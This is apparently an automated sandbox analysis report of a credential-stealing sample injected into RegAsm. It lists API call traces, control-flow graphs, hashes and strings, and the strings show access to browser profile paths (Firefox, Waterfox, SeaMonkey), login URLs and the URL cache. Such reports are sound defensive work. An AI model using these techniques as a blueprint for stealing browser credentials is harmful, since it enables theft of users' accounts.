                                                                        • API ID: Handle$??3@CloseProcessProcess32memset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                        • API String ID: 3791284831-1740548384
                                                                        • Opcode ID: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                        • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                        • Opcode Fuzzy Hash: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                        • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                        Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                          • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                          • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                        • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                          • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                        • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                        • String ID: bhv
                                                                        • API String ID: 4234240956-2689659898
                                                                        • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                        • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                        Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                        • __set_app_type.MSVCRT ref: 00446762
                                                                        • __p__fmode.MSVCRT ref: 00446777
                                                                        • __p__commode.MSVCRT ref: 00446785
                                                                        • __setusermatherr.MSVCRT ref: 004467B1
                                                                        • _initterm.MSVCRT ref: 004467C7
                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                        • _initterm.MSVCRT ref: 004467FD
                                                                        • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                        • exit.MSVCRT ref: 00446897
                                                                        • _cexit.MSVCRT ref: 0044689D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                        • String ID:
                                                                        • API String ID: 2791496988-0
                                                                        • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                        • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                        • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                        • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                        Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040C298
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                        • wcschr.MSVCRT ref: 0040C324
                                                                        • wcschr.MSVCRT ref: 0040C344
                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                        • GetLastError.KERNEL32 ref: 0040C373
                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                        • String ID: visited:
                                                                        • API String ID: 2470578098-1702587658
                                                                        • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                        • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                        • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                        • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                        Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 ??3@YAXPAX@Z 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                        APIs
                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                        • memset.MSVCRT ref: 0040E1BD
                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                        • _snwprintf.MSVCRT ref: 0040E257
                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                        • API String ID: 3883404497-2982631422
                                                                        • Opcode ID: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                        • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                        • Opcode Fuzzy Hash: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                        • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                        Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                        • memset.MSVCRT ref: 0040BC75
                                                                        • memset.MSVCRT ref: 0040BC8C
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                        • memcmp.MSVCRT ref: 0040BCD6
                                                                        • memcpy.MSVCRT ref: 0040BD2B
                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                        • String ID:
                                                                        • API String ID: 115830560-3916222277
                                                                        • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                        • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                        • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                        • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                        Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                        • String ID: r!A
                                                                        • API String ID: 2791114272-628097481
                                                                        • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                        • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                        • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                        • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                        Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                          • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                          • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                        • _wcslwr.MSVCRT ref: 0040C817
                                                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                        • wcslen.MSVCRT ref: 0040C82C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                        • API String ID: 62308376-4196376884
                                                                        • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                        • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                        • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                        • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                        Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                        • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                        • memcpy.MSVCRT ref: 0040B60D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                        • String ID: BIN
                                                                        • API String ID: 1668488027-1015027815
                                                                        • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                        • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                        • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                        • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                        Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403CBF
                                                                        • memset.MSVCRT ref: 00403CD4
                                                                        • memset.MSVCRT ref: 00403CE9
                                                                        • memset.MSVCRT ref: 00403CFE
                                                                        • memset.MSVCRT ref: 00403D13
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 00403DDA
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                        • API String ID: 4039892925-11920434
                                                                        • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                        • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                        • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                        • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                        Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403E50
                                                                        • memset.MSVCRT ref: 00403E65
                                                                        • memset.MSVCRT ref: 00403E7A
                                                                        • memset.MSVCRT ref: 00403E8F
                                                                        • memset.MSVCRT ref: 00403EA4
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 00403F6B
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                        • API String ID: 4039892925-2068335096
                                                                        • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                        • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                        • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                        • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                        Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403FE1
                                                                        • memset.MSVCRT ref: 00403FF6
                                                                        • memset.MSVCRT ref: 0040400B
                                                                        • memset.MSVCRT ref: 00404020
                                                                        • memset.MSVCRT ref: 00404035
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 004040FC
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                        • API String ID: 4039892925-3369679110
                                                                        • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                        • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                        • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                        • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                        Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
